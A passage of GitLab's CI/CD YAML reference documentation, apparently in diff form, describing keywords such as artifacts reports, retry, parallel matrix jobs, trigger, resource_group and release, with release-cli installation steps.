Quality issues](../../user/project/merge_requests/code_quality.md) +as artifacts. + +The collected Code Quality report uploads to GitLab as an artifact and is summarized in merge requests. + +##### `artifacts:reports:container_scanning` **(ULTIMATE)** + +> - Introduced in GitLab 11.5. +> - Requires GitLab Runner 11.5 and above. + +The `container_scanning` report collects [Container Scanning vulnerabilities](../../user/application_security/container_scanning/index.md) +as artifacts. + +The collected Container Scanning report uploads to GitLab as an artifact and +is summarized in merge requests and the pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:coverage_fuzzing` **(ULTIMATE)** + +> - Introduced in GitLab 13.4. +> - Requires GitLab Runner 13.4 or later. + +The `coverage_fuzzing` report collects [coverage fuzzing bugs](../../user/application_security/coverage_fuzzing/index.md) +as artifacts. + +The collected coverage fuzzing report uploads to GitLab as an artifact and is summarized in merge +requests and the pipeline view. It's also used to provide data for security dashboards. + +##### `artifacts:reports:cluster_image_scanning` **(ULTIMATE)** + +> - Introduced in GitLab 14.1. +> - Requires GitLab Runner 14.1 and above. + +The `cluster_image_scanning` report collects `CLUSTER_IMAGE_SCANNING` vulnerabilities +as artifacts. + +The collected `CLUSTER_IMAGE_SCANNING` report uploads to GitLab as an artifact and +is summarized in the pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:dast` **(ULTIMATE)** + +> - Introduced in GitLab 11.5. +> - Requires GitLab Runner 11.5 and above. + +The `dast` report collects [DAST vulnerabilities](../../user/application_security/dast/index.md) +as artifacts. + +The collected DAST report uploads to GitLab as an artifact and is summarized in merge requests and the pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:dependency_scanning` **(ULTIMATE)** + +> - Introduced in GitLab 11.5. +> - Requires GitLab Runner 11.5 and above. + +The `dependency_scanning` report collects [Dependency Scanning vulnerabilities](../../user/application_security/dependency_scanning/index.md) +as artifacts. + +The collected Dependency Scanning report uploads to GitLab as an artifact and is summarized in merge requests and the pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:dotenv` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/17066) in GitLab 12.9. +> - Requires GitLab Runner 11.5 and later. + +The `dotenv` report collects a set of environment variables as artifacts. + +The collected variables are registered as runtime-created variables of the job, +which is useful to [set dynamic environment URLs after a job finishes](../environments/index.md#set-dynamic-environment-urls-after-a-job-finishes). + +There are a couple of exceptions to the [original dotenv rules](https://github.com/motdotla/dotenv#rules): + +- The variable key can contain only letters, digits, and underscores (`_`). +- The maximum size of the `.env` file is 5 KB. +- In GitLab 13.5 and older, the maximum number of inherited variables is 10. +- In [GitLab 13.6 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/247913), + the maximum number of inherited variables is 20. +- Variable substitution in the `.env` file is not supported. +- The `.env` file can't have empty lines or comments (starting with `#`). +- Key values in the `env` file cannot have spaces or newline characters (`\n`), including when using single or double quotes. +- Quote escaping during parsing (`key = 'value'` -> `{key: "value"}`) is not supported. + +##### `artifacts:reports:junit` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/20390) in GitLab 11.2. +> - Requires GitLab Runner 11.2 and above. + +The `junit` report collects [JUnit report format XML files](https://www.ibm.com/docs/en/adfz/developer-for-zos/14.1.0?topic=formats-junit-xml-format) +as artifacts. Although JUnit was originally developed in Java, there are many +third party ports for other +languages like JavaScript, Python, Ruby, and so on. + +See [Unit test reports](../unit_test_reports.md) for more details and examples. +Below is an example of collecting a JUnit report format XML file from Ruby's RSpec test tool: + +```yaml +rspec: + stage: test + script: + - bundle install + - rspec --format RspecJunitFormatter --out rspec.xml + artifacts: + reports: + junit: rspec.xml +``` + +The collected Unit test reports upload to GitLab as an artifact and display in merge requests. + +If the JUnit tool you use exports to multiple XML files, specify +multiple test report paths within a single job to +concatenate them into a single file. Use a filename pattern (`junit: rspec-*.xml`), +an array of filenames (`junit: [rspec-1.xml, rspec-2.xml, rspec-3.xml]`), or a +combination thereof (`junit: [rspec.xml, test-results/TEST-*.xml]`). + +##### `artifacts:reports:license_scanning` **(ULTIMATE)** + +> - Introduced in GitLab 12.8. +> - Requires GitLab Runner 11.5 and above. + +The `license_scanning` report collects [Licenses](../../user/compliance/license_compliance/index.md) +as artifacts. + +The License Compliance report uploads to GitLab as an artifact and displays automatically in merge requests and the pipeline view, and provide data for security +dashboards. + +##### `artifacts:reports:load_performance` **(PREMIUM)** + +> - Introduced in [GitLab 13.2](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/35260) in [GitLab Premium](https://about.gitlab.com/pricing/) 13.2. +> - Requires GitLab Runner 11.5 and above. + +The `load_performance` report collects [Load Performance Testing metrics](../../user/project/merge_requests/load_performance_testing.md) +as artifacts. + +The report is uploaded to GitLab as an artifact and is +shown in merge requests automatically. + +##### `artifacts:reports:metrics` **(PREMIUM)** + +> Introduced in GitLab 11.10. + +The `metrics` report collects [Metrics](../metrics_reports.md) +as artifacts. + +The collected Metrics report uploads to GitLab as an artifact and displays in merge requests. + +##### `artifacts:reports:browser_performance` **(PREMIUM)** + +> - Introduced in GitLab 11.5. +> - Requires GitLab Runner 11.5 and above. +> - [Name changed](https://gitlab.com/gitlab-org/gitlab/-/issues/225914) from `artifacts:reports:performance` in GitLab 14.0. + +The `browser_performance` report collects [Browser Performance Testing metrics](../../user/project/merge_requests/browser_performance_testing.md) +as artifacts. + +The collected Browser Performance report uploads to GitLab as an artifact and displays in merge requests. + +##### `artifacts:reports:requirements` **(ULTIMATE)** + +> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/2859) in GitLab 13.1. +> - Requires GitLab Runner 11.5 and above. + +The `requirements` report collects `requirements.json` files as artifacts. + +The collected Requirements report uploads to GitLab as an artifact and +existing [requirements](../../user/project/requirements/index.md) are +marked as Satisfied. + +##### `artifacts:reports:sast` + +> - Introduced in GitLab 11.5. +> - Made [available in all tiers](https://gitlab.com/groups/gitlab-org/-/epics/2098) in GitLab 13.3. +> - Requires GitLab Runner 11.5 and above. + +The `sast` report collects [SAST vulnerabilities](../../user/application_security/sast/index.md) +as artifacts. + +The collected SAST report uploads to GitLab as an artifact and is summarized +in merge requests and the pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:secret_detection` + +> - Introduced in GitLab 13.1. +> - Made [available in all tiers](https://gitlab.com/gitlab-org/gitlab/-/issues/222788) in GitLab + 13.3. +> - Requires GitLab Runner 11.5 and above. + +The `secret-detection` report collects [detected secrets](../../user/application_security/secret_detection/index.md) +as artifacts. + +The collected Secret Detection report is uploaded to GitLab as an artifact and summarized +in the merge requests and pipeline view. It's also used to provide data for security +dashboards. + +##### `artifacts:reports:terraform` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207528) in GitLab 13.0. +> - Requires [GitLab Runner](https://docs.gitlab.com/runner/) 11.5 and above. + +The `terraform` report obtains a Terraform `tfplan.json` file. [JQ processing required to remove credentials](../../user/infrastructure/mr_integration.md#setup). The collected Terraform +plan report uploads to GitLab as an artifact and displays +in merge requests. For more information, see +[Output `terraform plan` information into a merge request](../../user/infrastructure/mr_integration.md). + +#### `artifacts:untracked` + +Use `artifacts:untracked` to add all Git untracked files as artifacts (along +with the paths defined in `artifacts:paths`). `artifacts:untracked` ignores configuration +in the repository's `.gitignore` file. + +Send all Git untracked files: + +```yaml +artifacts: + untracked: true +``` + +Send all Git untracked files and files in `binaries`: + +```yaml +artifacts: + untracked: true + paths: + - binaries/ +``` + +Send all untracked files but [exclude](#artifactsexclude) `*.txt`: + +```yaml +artifacts: + untracked: true + exclude: + - "*.txt" +``` + +#### `artifacts:when` + +Use `artifacts:when` to upload artifacts on job failure or despite the +failure. + +`artifacts:when` can be set to one of the following values: + +1. `on_success` (default): Upload artifacts only when the job succeeds. +1. `on_failure`: Upload artifacts only when the job fails. +1. `always`: Always upload artifacts. Useful, for example, when + [uploading artifacts](../unit_test_reports.md#viewing-junit-screenshots-on-gitlab) required to + troubleshoot failing tests. + +For example, to upload artifacts only when a job fails: + +```yaml +job: + artifacts: + when: on_failure +``` + +### `coverage` + +Use `coverage` to configure how code coverage is extracted from the +job output. + +Regular expressions are the only valid kind of value expected here. So, using +surrounding `/` is mandatory to consistently and explicitly represent +a regular expression string. You must escape special characters if you want to +match them literally. + +For example: + +```yaml +job1: + script: rspec + coverage: '/Code coverage: \d+\.\d+/' +``` + +The coverage is shown in the UI if at least one line in the job output matches the regular expression. +If there is more than one matched line in the job output, the last line is used. +For the matched line, the first occurrence of `\d+(\.\d+)?` is the code coverage. +Leading zeros are removed. + +Coverage output from [child pipelines](../pipelines/parent_child_pipelines.md) is not recorded +or displayed. Check [the related issue](https://gitlab.com/gitlab-org/gitlab/-/issues/280818) +for more details. + +### `retry` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/3515) in GitLab 11.5, you can control which failures to retry on. + +Use `retry` to configure how many times a job is retried in +case of a failure. + +When a job fails, the job is processed again, +until the limit specified by the `retry` keyword is reached. + +If `retry` is set to `2`, and a job succeeds in a second run (first retry), it is not retried. +The `retry` value must be a positive integer, from `0` to `2` +(two retries maximum, three runs in total). + +The following example retries all failure cases: + +```yaml +test: + script: rspec + retry: 2 +``` + +By default, a job is retried on all failure cases. To have better control +over which failures to retry, `retry` can be a hash with the following keys: + +- `max`: The maximum number of retries. +- `when`: The failure cases to retry. + +To retry only runner system failures at maximum two times: + +```yaml +test: + script: rspec + retry: + max: 2 + when: runner_system_failure +``` + +If there is another failure, other than a runner system failure, the job +is not retried. + +To retry on multiple failure cases, `when` can also be an array of failures: + +```yaml +test: + script: rspec + retry: + max: 2 + when: + - runner_system_failure + - stuck_or_timeout_failure +``` + +Possible values for `when` are: + +<!-- + If you change any of the values below, make sure to update the `RETRY_WHEN_IN_DOCUMENTATION` + array in `spec/lib/gitlab/ci/config/entry/retry_spec.rb`. + The test there makes sure that all documented + values are valid as a configuration option and therefore should always + stay in sync with this documentation. +--> + +- `always`: Retry on any failure (default). +- `unknown_failure`: Retry when the failure reason is unknown. +- `script_failure`: Retry when the script failed. +- `api_failure`: Retry on API failure. +- `stuck_or_timeout_failure`: Retry when the job got stuck or timed out. +- `runner_system_failure`: Retry if there is a runner system failure (for example, job setup failed). +- `missing_dependency_failure`: Retry if a dependency is missing. +- `runner_unsupported`: Retry if the runner is unsupported. +- `stale_schedule`: Retry if a delayed job could not be executed. +- `job_execution_timeout`: Retry if the script exceeded the maximum execution time set for the job. +- `archived_failure`: Retry if the job is archived and can't be run. +- `unmet_prerequisites`: Retry if the job failed to complete prerequisite tasks. +- `scheduler_failure`: Retry if the scheduler failed to assign the job to a runner. +- `data_integrity_failure`: Retry if there is a structural integrity problem detected. + +You can specify the number of [retry attempts for certain stages of job execution](../runners/configure_runners.md#job-stages-attempts) using variables. + +### `timeout` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14887) in GitLab 12.3. + +Use `timeout` to configure a timeout for a specific job. For example: + +```yaml +build: + script: build.sh + timeout: 3 hours 30 minutes + +test: + script: rspec + timeout: 3h 30m +``` + +The job-level timeout can exceed the +[project-level timeout](../pipelines/settings.md#set-a-limit-for-how-long-jobs-can-run) but can't +exceed the runner-specific timeout. + +### `parallel` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/21480) in GitLab 11.5. + +Use `parallel` to configure how many instances of a job to run in parallel. +The value can be from 2 to 50. + +The `parallel` keyword creates N instances of the same job that run in parallel. +They are named sequentially from `job_name 1/N` to `job_name N/N`: + +```yaml +test: + script: rspec + parallel: 5 +``` + +Every parallel job has a `CI_NODE_INDEX` and `CI_NODE_TOTAL` +[predefined CI/CD variable](../variables/index.md#predefined-cicd-variables) set. + +Different languages and test suites have different methods to enable parallelization. +For example, use [Semaphore Test Boosters](https://github.com/renderedtext/test-boosters) +and RSpec to run Ruby tests in parallel: + +```ruby +# Gemfile +source 'https://rubygems.org' + +gem 'rspec' +gem 'semaphore_test_boosters' +``` + +```yaml +test: + parallel: 3 + script: + - bundle + - bundle exec rspec_booster --job $CI_NODE_INDEX/$CI_NODE_TOTAL +``` + +WARNING: +Test Boosters reports usage statistics to the author. + +You can then navigate to the **Jobs** tab of a new pipeline build and see your RSpec +job split into three separate jobs. + +#### Parallel `matrix` jobs + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15356) in GitLab 13.3. + +Use `matrix:` to run a job multiple times in parallel in a single pipeline, +but with different variable values for each instance of the job. +There can be from 2 to 50 jobs. + +Jobs can only run in parallel if there are multiple runners, or a single runner is +[configured to run multiple jobs concurrently](#use-your-own-runners). + +Every job gets the same `CI_NODE_TOTAL` [CI/CD variable](../variables/index.md#predefined-cicd-variables) value, and a unique `CI_NODE_INDEX` value. + +```yaml +deploystacks: + stage: deploy + script: + - bin/deploy + parallel: + matrix: + - PROVIDER: aws + STACK: + - monitoring + - app1 + - app2 + - PROVIDER: ovh + STACK: [monitoring, backup, app] + - PROVIDER: [gcp, vultr] + STACK: [data, processing] +``` + +The following example generates 10 parallel `deploystacks` jobs, each with different values +for `PROVIDER` and `STACK`: + +```plaintext +deploystacks: [aws, monitoring] +deploystacks: [aws, app1] +deploystacks: [aws, app2] +deploystacks: [ovh, monitoring] +deploystacks: [ovh, backup] +deploystacks: [ovh, app] +deploystacks: [gcp, data] +deploystacks: [gcp, processing] +deploystacks: [vultr, data] +deploystacks: [vultr, processing] +``` + +The job naming style was [improved in GitLab 13.4](https://gitlab.com/gitlab-org/gitlab/-/issues/230452). + +##### One-dimensional `matrix` jobs + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/26362) in GitLab 13.5. + +You can also have one-dimensional matrices with a single job: + +```yaml +deploystacks: + stage: deploy + script: + - bin/deploy + parallel: + matrix: + - PROVIDER: [aws, ovh, gcp, vultr] +``` + +##### Parallel `matrix` trigger jobs + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/270957) in GitLab 13.10. + +Use `matrix:` to run a [trigger](#trigger) job multiple times in parallel in a single pipeline, +but with different variable values for each instance of the job. + +```yaml +deploystacks: + stage: deploy + trigger: + include: path/to/child-pipeline.yml + parallel: + matrix: + - PROVIDER: aws + STACK: [monitoring, app1] + - PROVIDER: ovh + STACK: [monitoring, backup] + - PROVIDER: [gcp, vultr] + STACK: [data] +``` + +This example generates 6 parallel `deploystacks` trigger jobs, each with different values +for `PROVIDER` and `STACK`, and they create 6 different child pipelines with those variables. + +```plaintext +deploystacks: [aws, monitoring] +deploystacks: [aws, app1] +deploystacks: [ovh, monitoring] +deploystacks: [ovh, backup] +deploystacks: [gcp, data] +deploystacks: [vultr, data] +``` + +### `trigger` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/8997) in [GitLab Premium](https://about.gitlab.com/pricing/) 11.8. +> - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. + +Use `trigger` to define a downstream pipeline trigger. When GitLab starts a `trigger` job, +a downstream pipeline is created. + +Jobs with `trigger` can only use a [limited set of keywords](../pipelines/multi_project_pipelines.md#define-multi-project-pipelines-in-your-gitlab-ciyml-file). +For example, you can't run commands with [`script`](#script), [`before_script`](#before_script), +or [`after_script`](#after_script). + +You can use this keyword to create two different types of downstream pipelines: + +- [Multi-project pipelines](../pipelines/multi_project_pipelines.md#define-multi-project-pipelines-in-your-gitlab-ciyml-file) +- [Child pipelines](../pipelines/parent_child_pipelines.md) + +[In GitLab 13.2](https://gitlab.com/gitlab-org/gitlab/-/issues/197140/) and later, you can +view which job triggered a downstream pipeline. In the [pipeline graph](../pipelines/index.md#visualize-pipelines), +hover over the downstream pipeline job. + +In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/201938) and later, you +can use [`when:manual`](#whenmanual) in the same job as `trigger`. In GitLab 13.4 and +earlier, using them together causes the error `jobs:#{job-name} when should be on_success, on_failure or always`. +You [cannot start `manual` trigger jobs with the API](https://gitlab.com/gitlab-org/gitlab/-/issues/284086). + +#### Basic `trigger` syntax for multi-project pipelines + +You can configure a downstream trigger by using the `trigger` keyword +with a full path to a downstream project: + +```yaml +rspec: + stage: test + script: bundle exec rspec + +staging: + stage: deploy + trigger: my/deployment +``` + +#### Complex `trigger` syntax for multi-project pipelines + +You can configure a branch name that GitLab uses to create +a downstream pipeline with: + +```yaml +rspec: + stage: test + script: bundle exec rspec + +staging: + stage: deploy + trigger: + project: my/deployment + branch: stable +``` + +To mirror the status from a triggered pipeline: + +```yaml +trigger_job: + trigger: + project: my/project + strategy: depend +``` + +To mirror the status from an upstream pipeline: + +```yaml +upstream_bridge: + stage: test + needs: + pipeline: other/project +``` + +#### `trigger` syntax for child pipeline + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/16094) in GitLab 12.7. + +To create a [child pipeline](../pipelines/parent_child_pipelines.md), specify the path to the +YAML file that contains the configuration of the child pipeline: + +```yaml +trigger_job: + trigger: + include: path/to/child-pipeline.yml +``` + +Similar to [multi-project pipelines](../pipelines/multi_project_pipelines.md#mirror-status-of-a-triggered-pipeline-in-the-trigger-job), +it's possible to mirror the status from a triggered pipeline: + +```yaml +trigger_job: + trigger: + include: + - local: path/to/child-pipeline.yml + strategy: depend +``` + +##### Trigger child pipeline with generated configuration file + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/35632) in GitLab 12.9. + +You can also trigger a child pipeline from a [dynamically generated configuration file](../pipelines/parent_child_pipelines.md#dynamic-child-pipelines): + +```yaml +generate-config: + stage: build + script: generate-ci-config > generated-config.yml + artifacts: + paths: + - generated-config.yml + +child-pipeline: + stage: test + trigger: + include: + - artifact: generated-config.yml + job: generate-config +``` + +The `generated-config.yml` is extracted from the artifacts and used as the configuration +for triggering the child pipeline. + +##### Trigger child pipeline with files from another project + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/205157) in GitLab 13.5. + +To trigger child pipelines with files from another private project under the same +GitLab instance, use [`include:file`](#includefile): + +```yaml +child-pipeline: + trigger: + include: + - project: 'my-group/my-pipeline-library' + ref: 'main' + file: '/path/to/child-pipeline.yml' +``` + +#### Linking pipelines with `trigger:strategy` + +By default, the `trigger` job completes with the `success` status +as soon as the downstream pipeline is created. + +To force the `trigger` job to wait for the downstream (multi-project or child) pipeline to complete, use +`strategy: depend`. This setting makes the trigger job wait with a "running" status until the triggered +pipeline completes. At that point, the `trigger` job completes and displays the same status as +the downstream job. + +This setting can help keep your pipeline execution linear. In the following example, jobs from +subsequent stages wait for the triggered pipeline to successfully complete before +starting, which reduces parallelization. + +```yaml +trigger_job: + trigger: + include: path/to/child-pipeline.yml + strategy: depend +``` + +#### Trigger a pipeline by API call + +To force a rebuild of a specific branch, tag, or commit, you can use an API call +with a trigger token. + +The trigger token is different than the [`trigger`](#trigger) keyword. + +[Read more in the triggers documentation.](../triggers/index.md) + +### `interruptible` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/32022) in GitLab 12.3. + +Use `interruptible` to indicate that a running job should be canceled if made redundant by a newer pipeline run. +Defaults to `false` (uninterruptible). Jobs that have not started yet (pending) are considered interruptible +and safe to be cancelled. +This value is used only if the [automatic cancellation of redundant pipelines feature](../pipelines/settings.md#auto-cancel-redundant-pipelines) +is enabled. + +When enabled, a pipeline is immediately canceled when a new pipeline starts on the same branch if either of the following is true: + +- All jobs in the pipeline are set as interruptible. +- Any uninterruptible jobs have not started yet. + +Set jobs as interruptible that can be safely canceled once started (for instance, a build job). + +In the following example, a new pipeline run causes an existing running pipeline to be: + +- Canceled, if only `step-1` is running or pending. +- Not canceled, once `step-2` starts running. + +After an uninterruptible job starts running, the pipeline cannot be canceled. + +```yaml +stages: + - stage1 + - stage2 + - stage3 + +step-1: + stage: stage1 + script: + - echo "Can be canceled." + interruptible: true + +step-2: + stage: stage2 + script: + - echo "Can not be canceled." + +step-3: + stage: stage3 + script: + - echo "Because step-2 can not be canceled, this step can never be canceled, even though it's set as interruptible." + interruptible: true +``` + +### `resource_group` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15536) in GitLab 12.7. + +Sometimes running multiple jobs or pipelines at the same time in an environment +can lead to errors during the deployment. + +To avoid these errors, use the `resource_group` attribute to make sure that +the runner doesn't run certain jobs simultaneously. Resource groups behave similar +to semaphores in other programming languages. + +When the `resource_group` keyword is defined for a job in the `.gitlab-ci.yml` file, +job executions are mutually exclusive across different pipelines for the same project. +If multiple jobs belonging to the same resource group are enqueued simultaneously, +only one of the jobs is picked by the runner. The other jobs wait until the +`resource_group` is free. + +For example: + +```yaml +deploy-to-production: + script: deploy + resource_group: production +``` + +In this case, two `deploy-to-production` jobs in two separate pipelines can never run at the same time. As a result, +you can ensure that concurrent deployments never happen to the production environment. + +You can define multiple resource groups per environment. For example, +when deploying to physical devices, you may have multiple physical devices. Each device +can be deployed to, but there can be only one deployment per device at any given time. + +The `resource_group` value can only contain letters, digits, `-`, `_`, `/`, `$`, `{`, `}`, `.`, and spaces. +It can't start or end with `/`. + +For more information, see [Deployments Safety](../environments/deployment_safety.md). + +#### Pipeline-level concurrency control with Cross-Project/Parent-Child pipelines + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/39057) in GitLab 13.9. + +You can define `resource_group` for downstream pipelines that are sensitive to concurrent +executions. The [`trigger` keyword](#trigger) can trigger downstream pipelines. The +[`resource_group` keyword](#resource_group) can co-exist with it. This is useful to control the +concurrency for deployment pipelines, while running non-sensitive jobs concurrently. + +The following example has two pipeline configurations in a project. When a pipeline starts running, +non-sensitive jobs are executed first and aren't affected by concurrent executions in other +pipelines. However, GitLab ensures that there are no other deployment pipelines running before +triggering a deployment (child) pipeline. If other deployment pipelines are running, GitLab waits +until those pipelines finish before running another one. + +```yaml +# .gitlab-ci.yml (parent pipeline) + +build: + stage: build + script: echo "Building..." + +test: + stage: test + script: echo "Testing..." + +deploy: + stage: deploy + trigger: + include: deploy.gitlab-ci.yml + strategy: depend + resource_group: AWS-production +``` + +```yaml +# deploy.gitlab-ci.yml (child pipeline) + +stages: + - provision + - deploy + +provision: + stage: provision + script: echo "Provisioning..." + +deployment: + stage: deploy + script: echo "Deploying..." +``` + +You must define [`strategy: depend`](#linking-pipelines-with-triggerstrategy) +with the `trigger` keyword. This ensures that the lock isn't released until the downstream pipeline +finishes. + +### `release` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/19298) in GitLab 13.2. + +Use `release` to create a [release](../../user/project/releases/index.md). +Requires the [`release-cli`](https://gitlab.com/gitlab-org/release-cli/-/tree/master/docs) +to be available in your GitLab Runner Docker or shell executor. + +These keywords are supported: + +- [`tag_name`](#releasetag_name) +- [`description`](#releasedescription) +- [`name`](#releasename) (optional) +- [`ref`](#releaseref) (optional) +- [`milestones`](#releasemilestones) (optional) +- [`released_at`](#releasereleased_at) (optional) +- [`assets:links`](#releaseassetslinks) (optional) + +The release is created only if the job processes without error. If the Rails API +returns an error during release creation, the `release` job fails. + +#### `release-cli` Docker image + +You must specify the Docker image to use for the `release-cli`: + +```yaml +image: registry.gitlab.com/gitlab-org/release-cli:latest +``` + +#### `release-cli` for shell executors + +> [Introduced](https://gitlab.com/gitlab-org/release-cli/-/issues/21) in GitLab 13.8. + +For GitLab Runner shell executors, you can download and install the `release-cli` manually for your [supported OS and architecture](https://release-cli-downloads.s3.amazonaws.com/latest/index.html). +Once installed, the `release` keyword should be available to you. + +**Install on Unix/Linux** + +1. Download the binary for your system, in the following example for amd64 systems: + + ```shell + curl --location --output /usr/local/bin/release-cli "https://release-cli-downloads.s3.amazonaws.com/latest/release-cli-linux-amd64" + ``` + +1. Give it permissions to execute: + + ```shell + sudo chmod +x /usr/local/bin/release-cli + ``` + +1. Verify `release-cli` is available: + + ```shell + $ release-cli -v + + release-cli version 0.6.0 + ``` + +**Install on Windows PowerShell** + +1. Create a folder somewhere in your system, for example `C:\GitLab\Release-CLI\bin` + + ```shell + New-Item -Path 'C:\GitLab\Release-CLI\bin' -ItemType Directory + ``` + +1. Download the executable file: + + ```shell + PS C:\> Invoke-WebRequest -Uri "https://release-cli-downloads.s3.amazonaws.com/latest/release-cli-windows-amd64.exe" -OutFile "C:\GitLab\Release-CLI\bin\release-cli.exe" + + Directory: C:\GitLab\Release-CLI + Mode LastWriteTime Length Name + ---- ------------- ------ ---- + d----- 3/16/2021 4:17 AM bin + + ``` + +1. Add the directory to your `$env:PATH`: + + ```shell + $env:PATH += ";C:\GitLab\Release-CLI\bin" + ``` + +1. Verify `release-cli` is available: + + ```shell + PS C:\> release-cli -v + + release-cli version 0.6.0 + ``` + +#### Use a custom SSL CA certificate authority + +You can use the `ADDITIONAL_CA_CERT_BUNDLE` CI/CD variable to configure a custom SSL CA certificate authority, +which is used to verify the peer when the `release-cli` creates a release through the API using HTTPS with custom certificates. +The `ADDITIONAL_CA_CERT_BUNDLE` value should contain the +[text representation of the X.509 PEM public-key certificate](https://tools.ietf.org/html/rfc7468#section-5.1) +or the `path/to/file` containing the certificate authority. +For example, to configure this value in the `.gitlab-ci.yml` file, use the following: + +```yaml +release: + variables: + ADDITIONAL_CA_CERT_BUNDLE: | + -----BEGIN CERTIFICATE----- + MIIGqTCCBJGgAwIBAgIQI7AVxxVwg2kch4d56XNdDjANBgkqhkiG9w0BAQsFADCB + ... + jWgmPqF3vUbZE0EyScetPJquRFRKIesyJuBFMAs= + -----END CERTIFICATE----- + script: + - echo "Create release" + release: + name: 'My awesome release' + tag_name: '$CI_COMMIT_TAG' +``` + +The `ADDITIONAL_CA_CERT_BUNDLE` value can also be configured as a +[custom variable in the UI](../variables/index.md#custom-cicd-variables), +either as a `file`, which requires the path to the certificate, or as a variable, +which requires the text representation of the certificate. + +#### `script` + +All jobs except [trigger](#trigger) jobs must have the `script` keyword. A `release` +job can use the output from script commands, but you can use a placeholder script if +the script is not needed: + +```yaml +script: + - echo 'release job' +``` + +An [issue](https://gitlab.com/gitlab-org/gitlab/-/issues/223856) exists to remove this requirement in an upcoming version of GitLab. + +A pipeline can have multiple `release` jobs, for example: + +```yaml +ios-release: + script: + - echo 'iOS release job' + release: + tag_name: v1.0.0-ios + description: 'iOS release v1.0.0' + +android-release: + script: + - echo 'Android release job' + release: + tag_name: v1.0.0-android + description: 'Android release v1.0.0' +``` + +#### `release:tag_name` + +You must specify a `tag_name` for the release. The tag can refer to an existing Git tag or +you can specify a new tag. + +When the specified tag doesn't exist in the repository, a new tag is created from the associated SHA of the pipeline. + +For example, when creating a release from a Git tag: + +```yaml +job: + release: + tag_name: $CI_COMMIT_TAG + description: 'Release description' +``` + +It is also possible for the release job to automatically create a new unique tag. In that case, +do not use [`rules`](#rules) or [`only`](#only--except) to configure the job to +only run for tags. + +A semantic versioning example: + +```yaml +job: + release: + tag_name: ${MAJOR}_${MINOR}_${REVISION} + description: 'Release description' +``` + +- The release is created only if the job's main script succeeds. +- If the release already exists, it is not updated and the job with the `release` keyword fails. +- The `release` section executes after the `script` tag and before the `after_script`. + +#### `release:name` + +The release name. If omitted, it is populated with the value of `release: tag_name`. + +#### `release:description` + +Specifies the long description of the release. You can also specify a file that contains the +description. + +##### Read description from a file + +> [Introduced](https://gitlab.com/gitlab-org/release-cli/-/merge_requests/67) in GitLab 13.7. + +You can specify a file in `$CI_PROJECT_DIR` that contains the description. The file must be relative +to the project directory (`$CI_PROJECT_DIR`), and if the file is a symbolic link it can't reside +outside of `$CI_PROJECT_DIR`. The `./path/to/file` and filename can't contain spaces. + +```yaml +job: + release: + tag_name: ${MAJOR}_${MINOR}_${REVISION} + description: './path/to/CHANGELOG.md' +``` + +#### `release:ref` + +If the `release: tag_name` doesn't exist yet, the release is created from `ref`. +`ref` can be a commit SHA, another tag name, or a branch name. + +#### `release:milestones` + +The title of each milestone the release is associated with. + +#### `release:released_at` + +The date and time when the release is ready. Defaults to the current date and time if not +defined. Should be enclosed in quotes and expressed in ISO 8601 format. + +```json +released_at: '2021-03-15T08:00:00Z' +``` + +#### `release:assets:links` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/271454) in GitLab 13.12. + +Include [asset links](../../user/project/releases/index.md#release-assets) in the release. + +NOTE: +Requires `release-cli` version v0.4.0 or higher. + +```yaml +assets: + links: + - name: 'asset1' + url: 'https://example.com/assets/1' + - name: 'asset2' + url: 'https://example.com/assets/2' + filepath: '/pretty/url/1' # optional + link_type: 'other' # optional +``` + +#### Complete example for `release` + +If you combine the previous examples for `release`, you get two options, depending on how you generate the +tags. You can't use these options together, so choose one: + +- To create a release when you push a Git tag, or when you add a Git tag + in the UI by going to **Repository > Tags**: + + ```yaml + release_job: + stage: release + image: registry.gitlab.com/gitlab-org/release-cli:latest + rules: + - if: $CI_COMMIT_TAG # Run this job when a tag is created manually + script: + - echo 'running release_job' + release: + name: 'Release $CI_COMMIT_TAG' + description: 'Created using the release-cli $EXTRA_DESCRIPTION' # $EXTRA_DESCRIPTION must be defined + tag_name: '$CI_COMMIT_TAG' # elsewhere in the pipeline. + ref: '$CI_COMMIT_TAG' + milestones: + - 'm1' + - 'm2' + - 'm3' + released_at: '2020-07-15T08:00:00Z' # Optional, is auto generated if not defined, or can use a variable. + assets: # Optional, multiple asset links + links: + - name: 'asset1' + url: 'https://example.com/assets/1' + - name: 'asset2' + url: 'https://example.com/assets/2' + filepath: '/pretty/url/1' # optional + link_type: 'other' # optional + ``` + +- To create a release automatically when commits are pushed or merged to the default branch, + using a new Git tag that is defined with variables: + + NOTE: + Environment variables set in `before_script` or `script` are not available for expanding + in the same job. Read more about + [potentially making variables available for expanding](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/6400). + + ```yaml + prepare_job: + stage: prepare # This stage must run before the release stage + rules: + - if: $CI_COMMIT_TAG + when: never # Do not 